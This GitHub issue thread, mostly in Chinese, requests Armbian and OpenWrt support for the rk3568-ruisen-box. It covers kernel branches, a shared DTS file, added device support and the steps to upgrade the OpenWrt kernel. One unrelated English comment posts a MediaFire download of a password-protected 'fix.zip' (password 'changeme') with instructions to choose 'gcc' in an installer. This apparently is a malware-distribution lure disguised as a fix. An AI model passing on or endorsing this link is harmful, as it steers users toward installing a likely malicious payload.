### ISSUE TITLE
请求增加rk3568-ruisen-box支持

### ISSUE THREAD

**Issue by ysuolmai** [ophub/amlogic-s9xxx-armbian#2508]
[rk3568-ruisen-box.zip](https://github.com/user-attachments/files/16748626/rk3568-ruisen-box.zip)

找到个大佬做的固件，能升级到6.1.75内核（很奇怪只能升级到这个，而且无法升级到6.6，会提示找不到新内核），但是提取dtb, armbianEnv.txt，boot.scr, boot.cmd放到其他镜像里，就无法启动。求大佬加入这个盒子的支持！

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ophub** [comment]
这是rockchip专用内核：https://github.com/ophub/kernel/releases/tag/kernel_rk35xx

6.1.75是官方目前的版本，几个月更新一下版本号：https://github.com/armbian/linux-rockchip

**Comment by ysuolmai** [comment]
> 这是rockchip专用内核：https://github.com/ophub/kernel/releases/tag/kernel_rk35xx
> 
> 6.1.75是官方目前的版本，几个月更新一下版本号：https://github.com/armbian/linux-rockchip
> 
> 发个完整固件下载地址，只有dtb不行。

大佬固件在这http://download.oeele.com/d/linux/rockchip/RK3568/%E7%91%9E%E6%A3%AEbox/%E5%9B%BA%E4%BB%B6/Armbian_24.8.0_rockchip_ruisen-box_noble_5.10.160_server_2024.08.25.img.7z

**Comment by ophub** [comment]
你看看这个设备的配置和h66k，h68k哪个相似，使用这个固件测试下。

**Comment by Xianleewu** [comment]
我想这个固件大概率是我适配的😂，我这边需要用到硬件编解码和NPU，所有就用的5.10的内核
![screenshot-20240829-163300](https://github.com/user-attachments/assets/70a47c96-5e96-4ab7-aeba-3b429ec0498b)
dts我也上传下，可以在这个基础上改。
[rk3568-ruisenbox-dts-dtb.zip](https://github.com/user-attachments/files/16796197/rk3568-ruisenbox-dts-dtb.zip)

**Comment by ysuolmai** [comment]
是的大佬，alist网盘都是你的。我问了O仔说可以发给ophub😂

**Comment by ophub** [comment]
多谢分享，根据你提供的资料，我添加了这个设备的支持，固件在releases里可以下载，有空的时候测试下。这个dts我提交到f大的内核仓库里： https://github.com/unifreq/linux-5.10.y-rk35xx

以后有相关修改欢迎你pr

**Comment by ysuolmai** [comment]
> 多谢分享，根据你提供的资料，我添加了这个设备的支持，固件在releases里可以下载，有空的时候测试下。这个dts我提交到f大的内核仓库里： https://github.com/unifreq/linux-5.10.y-rk35xx
> 
> 以后有相关修改欢迎你pr

大佬， op和armbian都测过了， 都没有问题。armbian升级到6.1.75也没有问题，op不知道怎么升😄

**Comment by ophub** [comment]
好的👌。op升级内核有2个方法，一个是手动把一套内核的几个tar.gz包上传到/mnt/*p4/目录下，然后执行openwrt-kernel命令即可升级内核；另外一个方法是在系统—-晶晨宝盒—-插件设置—-选择6.1.y内核分支，保存，然后在线更新，选择第二个按钮（仅更新内核），即可在线下载内核，提示下载完成后，点更新即可。在线更新要确保自己的设备可以正常访问github.com网站，内核包文件存在这里。
